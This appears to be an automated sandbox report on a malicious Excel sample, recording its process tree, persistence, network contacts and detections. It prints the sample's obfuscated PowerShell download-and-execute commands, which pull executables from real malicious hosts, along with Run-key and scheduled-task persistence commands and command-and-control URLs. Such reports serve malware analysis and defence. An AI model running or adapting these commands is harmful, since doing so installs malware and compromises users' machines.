Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: qA"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q87HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools\.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_00401179 SetUnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Users\user\AppData\Roaming\svchost.exe

Network Connect: 172.67.167.122 80

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory written: C:\Users\user\AppData\Local\Temp\ps.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Users\user\AppData\Roaming\svchost.exe base: 400000 value starts with: 4D5A

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\Documents\pd.bat, type: DROPPED

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 24_2_00AD079A GetUserNameA,

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Scheduled Task/Job1	Access Token Manipulation1	Disable or Modify Tools111	OS Credential Dumping	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting311	Registry Run Keys / Startup Folder1	Process Injection211	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery12	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Scheduled Task/Job1	Scripting311	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution13	Logon Script (Mac)	Registry Run Keys / Startup Folder1	Obfuscated Files or Information4	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter11	Network Logon Script	Network Logon Script	Software Packing12	LSA Secrets	Security Software Discovery311	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Scheduled Task/Job1	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Virtualization/Sandbox Evasion13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	PowerShell2	Startup Items	Startup Items	Modify Registry1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection211	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	5%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ps.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
27.2.ps.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
36.2.svchost.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://cryptodual.net/cc/gate.php	0%	Avira URL Cloud	safe
http://www.piriform.c	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command	0%	Avira URL Cloud	safe
http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cutt.ly	172.67.8.238	true	true		unknown
cryptodual.net	172.67.167.122	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cryptodual.net/cc/gate.php	true	Avira URL Cloud: safe	unknown
http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command	true	Avira URL Cloud: safe	unknown
http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.piriform.com/ccleaner	powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	false		high
http://www.piriform.c	powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanenTZ	powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.8.238	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.167.122	unknown	United States	13335	CLOUDFLARENETUS	true
37.46.150.139	unknown	Moldova Republic of	8758	IWAYCH	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	335896
Start date:	04.01.2021
Start time:	19:14:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 15s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@60/23@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 55.9% Quality standard deviation: 20.6%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe HTTP Packets have been reduced TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 67.27.158.126, 67.26.137.254, 67.26.83.254, 8.253.204.249, 67.26.73.254 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:14:49	API Interceptor	446x Sleep call for process: powershell.exe modified
19:14:50	API Interceptor	1543x Sleep call for process: svchost.exe modified
19:15:07	API Interceptor	45x Sleep call for process: ps.exe modified
19:15:11	API Interceptor	2x Sleep call for process: schtasks.exe modified
19:15:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Users\user\AppData\Roaming\svchost.exe
19:15:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Users\user\AppData\Roaming\svchost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.8.238	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse
	spetsifikatsiya.xls	Get hash	malicious	Browse
	file.xls	Get hash	malicious	Browse
	file.xls	Get hash	malicious	Browse
	output.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.20246.xls	Get hash	malicious	Browse
	30689741.xls	Get hash	malicious	Browse
	95773220855.xls	Get hash	malicious	Browse
	MT-000137.xls	Get hash	malicious	Browse
	MOT_507465.xls	Get hash	malicious	Browse
	invoicedelivery20200912toxRG.xls	Get hash	malicious	Browse
	inter.xls	Get hash	malicious	Browse
	machine.xls	Get hash	malicious	Browse
	urXFLGgIxo.xls	Get hash	malicious	Browse
	LIST_OF_IDs_FOR_PAYOUT.xls	Get hash	malicious	Browse
	wHrBhrpp3q.csv	Get hash	malicious	Browse
	wHrBhrpp3q.csv	Get hash	malicious	Browse
	wHrBhrpp3q.csv	Get hash	malicious	Browse
	SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls	Get hash	malicious	Browse
	file.xls	Get hash	malicious	Browse
37.46.150.139	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_047e37f7-e236-4c64-9509-11f16943b4e0_mic2_wddisabler.bat
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_3357e6d8-1780-4654-872a-eca3aa375ffd_kingshakes_wdexclusion.bat
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
	AdviceSlip.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_929f596a-b84d-4151-a6b5-c95e07d329c0_frankie777_wddisabler.bat
	Export Order Vene.xls	Get hash	malicious	Browse	37.46.150.139/bat/scriptxls_d8648b70-66b3-4072-9876-0224b204a193_spicytorben_wdexclusion.bat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cutt.ly	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.1.232
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	172.67.8.238
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.0.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238
	AdviceSlip.xls	Get hash	malicious	Browse	104.22.0.232
	file.xls	Get hash	malicious	Browse	104.22.1.232
	file.xls	Get hash	malicious	Browse	172.67.8.238
	file.xls	Get hash	malicious	Browse	172.67.8.238
	output.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Heur.20246.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls	Get hash	malicious	Browse	104.22.1.232
	SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls	Get hash	malicious	Browse	104.22.0.232
	30689741.xls	Get hash	malicious	Browse	172.67.8.238
	95773220855.xls	Get hash	malicious	Browse	104.22.1.232
	95773220855.xls	Get hash	malicious	Browse	172.67.8.238
	MT-000137.xls	Get hash	malicious	Browse	172.67.8.238
	95773220855.xls	Get hash	malicious	Browse	104.22.0.232
	MT-000137.xls	Get hash	malicious	Browse	104.22.1.232
	MT-000137.xls	Get hash	malicious	Browse	104.22.0.232
	ordres de virement .xls	Get hash	malicious	Browse	104.22.1.232

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IWAYCH	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	AdviceSlip.xls	Get hash	malicious	Browse	37.46.150.139
	Export Order Vene.xls	Get hash	malicious	Browse	37.46.150.139
	SimpNet.sh	Get hash	malicious	Browse	37.46.150.238
	Rr0veY2Ho5.exe	Get hash	malicious	Browse	37.46.150.211
